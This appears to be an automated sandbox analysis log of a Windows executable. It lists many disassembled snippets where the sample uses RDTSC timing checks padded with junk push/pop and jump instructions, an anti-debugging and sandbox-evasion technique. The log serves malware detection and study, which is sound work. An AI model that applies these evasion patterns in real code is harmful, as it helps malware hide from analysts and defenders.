Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110C565 second address: 110C569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110C569 second address: 110C56D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110C56D second address: 110C5BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CFB4FE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FE66CFB4FE4h 0x00000013 jmp 00007FE66CFB4FE3h 0x00000018 push edx 0x00000019 je 00007FE66CFB4FD6h 0x0000001f pop edx 0x00000020 push eax 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111303B second address: 1113045 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE66CCE6056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11130D1 second address: 11130EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CFB4FE5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11130EB second address: 1113103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1113103 second address: 111310E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111310E second address: 1113121 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE66CCE6056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1113121 second address: 1113125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1113125 second address: 111312B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111A8F5 second address: 111A8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111A8F9 second address: 111A910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FE66CCE6056h 0x00000009 jng 00007FE66CCE6056h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B071 second address: 111B08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FE66CFB4FE9h 0x0000000b jmp 00007FE66CFB4FE3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B08F second address: 111B0A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007FE66CCE6056h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007FE66CCE606Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B0A7 second address: 111B0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B1F0 second address: 111B1F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B1F6 second address: 111B1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B1FA second address: 111B200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B628 second address: 111B63D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE66CFB4FE0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B63D second address: 111B64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B64C second address: 111B650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B650 second address: 111B65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B65A second address: 111B65E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B65E second address: 111B664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B664 second address: 111B674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE66CFB4FDAh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 111B990 second address: 111B9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jnl 00007FE66CCE6056h 0x0000000c pop edx 0x0000000d popad 0x0000000e push edi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1121118 second address: 112111C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112111C second address: 1121120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1121541 second address: 112155C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jng 00007FE66CFB4FD6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007FE66CFB4FD6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1120CE3 second address: 1120D07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007FE66CCE6056h 0x00000009 jng 00007FE66CCE6056h 0x0000000f pop esi 0x00000010 push ecx 0x00000011 jmp 00007FE66CCE6061h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1121C0F second address: 1121C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 ja 00007FE66CFB4FD6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1121EBB second address: 1121EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1121EBF second address: 1121EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1128090 second address: 1128097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C3B5 second address: 112C3D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE2h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FE66CFB4FDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C3D5 second address: 112C3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE66CCE6060h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C3ED second address: 112C3F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C3F1 second address: 112C3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C3FB second address: 112C418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FE66CFB4FDDh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C418 second address: 112C41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C41D second address: 112C422 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C53E second address: 112C565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE66CCE6066h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C565 second address: 112C586 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE4h 0x00000007 jl 00007FE66CFB4FD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C586 second address: 112C5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CCE605Eh 0x00000009 jo 00007FE66CCE6056h 0x0000000f js 00007FE66CCE6056h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE66CCE6061h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C5B8 second address: 112C5C6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE66CFB4FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C5C6 second address: 112C5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C886 second address: 112C89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FE66CFB4FD6h 0x0000000f je 00007FE66CFB4FD6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C89B second address: 112C89F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112C89F second address: 112C8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112CA07 second address: 112CA0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112CBC1 second address: 112CBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112CBC7 second address: 112CBDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FE66CCE6062h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112CDDC second address: 112CDF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE66CFB4FE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112CDF2 second address: 112CDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112CDF8 second address: 112CDFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112CFC4 second address: 112D001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jbe 00007FE66CCE6056h 0x0000000c jmp 00007FE66CCE6065h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FE66CCE6068h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112D412 second address: 112D440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE66CFB4FE0h 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE66CFB4FE4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112DA36 second address: 112DA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jmp 00007FE66CCE6060h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 112DA4F second address: 112DA64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FE66CFB4FD6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push esi 0x0000000d ja 00007FE66CFB4FD6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E4294 second address: 10CAB24 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE66CCE6056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007FE66CCE6060h 0x00000011 nop 0x00000012 jc 00007FE66CCE605Ch 0x00000018 xor edi, dword ptr [ebp+122D2A6Ch] 0x0000001e lea eax, dword ptr [ebp+12478FE3h] 0x00000024 mov dword ptr [ebp+122D1B83h], ecx 0x0000002a push eax 0x0000002b jl 00007FE66CCE6069h 0x00000031 mov dword ptr [esp], eax 0x00000034 mov ecx, dword ptr [ebp+122D1BB6h] 0x0000003a call dword ptr [ebp+122D2656h] 0x00000040 push edi 0x00000041 pushad 0x00000042 push edi 0x00000043 pop edi 0x00000044 jmp 00007FE66CCE6062h 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E4874 second address: 10E487A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E487A second address: 10E490C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE66CCE605Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jg 00007FE66CCE6064h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 jmp 00007FE66CCE6063h 0x0000001e pop eax 0x0000001f sub dword ptr [ebp+122D276Dh], ebx 0x00000025 mov edi, dword ptr [ebp+122D2B70h] 0x0000002b call 00007FE66CCE6059h 0x00000030 jo 00007FE66CCE6062h 0x00000036 ja 00007FE66CCE605Ch 0x0000003c push eax 0x0000003d push esi 0x0000003e jmp 00007FE66CCE6062h 0x00000043 pop esi 0x00000044 mov eax, dword ptr [esp+04h] 0x00000048 push edx 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c pop edx 0x0000004d pop edx 0x0000004e mov eax, dword ptr [eax] 0x00000050 push eax 0x00000051 push edx 0x00000052 jl 00007FE66CCE6058h 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E49FE second address: 10E4A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E4B5F second address: 10E4B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE66CCE6060h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E5209 second address: 10E5221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1132317 second address: 113231F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E4898 second address: 10E489C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E489C second address: 10E490C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007FE66CCE6063h 0x0000000f pop eax 0x00000010 sub dword ptr [ebp+122D276Dh], ebx 0x00000016 mov edi, dword ptr [ebp+122D2B70h] 0x0000001c call 00007FE66CCE6059h 0x00000021 jo 00007FE66CCE6062h 0x00000027 ja 00007FE66CCE605Ch 0x0000002d push eax 0x0000002e push esi 0x0000002f jmp 00007FE66CCE6062h 0x00000034 pop esi 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 push edx 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d pop edx 0x0000003e pop edx 0x0000003f mov eax, dword ptr [eax] 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007FE66CCE6058h 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1132483 second address: 1132489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11325C5 second address: 11325CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1132C9C second address: 1132CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11347E2 second address: 1134813 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FE66CCE605Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jnc 00007FE66CCE6056h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FE66CCE6056h 0x0000001b jmp 00007FE66CCE6061h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1134813 second address: 1134819 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1134819 second address: 113483D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FE66CCE6063h 0x0000000f jc 00007FE66CCE6056h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1136B52 second address: 1136B61 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE66CFB4FD6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 113946B second address: 1139471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1139712 second address: 1139718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1139718 second address: 113971C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 113971C second address: 1139720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1139720 second address: 1139743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CCE6069h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1139743 second address: 1139747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11398B0 second address: 11398B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11398B6 second address: 11398C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE66CFB4FD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11398C0 second address: 11398CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 113D1FD second address: 113D21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CFB4FE8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11418AE second address: 11418C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CCE605Ch 0x00000009 popad 0x0000000a jng 00007FE66CCE605Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10A1027 second address: 10A1031 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE66CFB4FD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
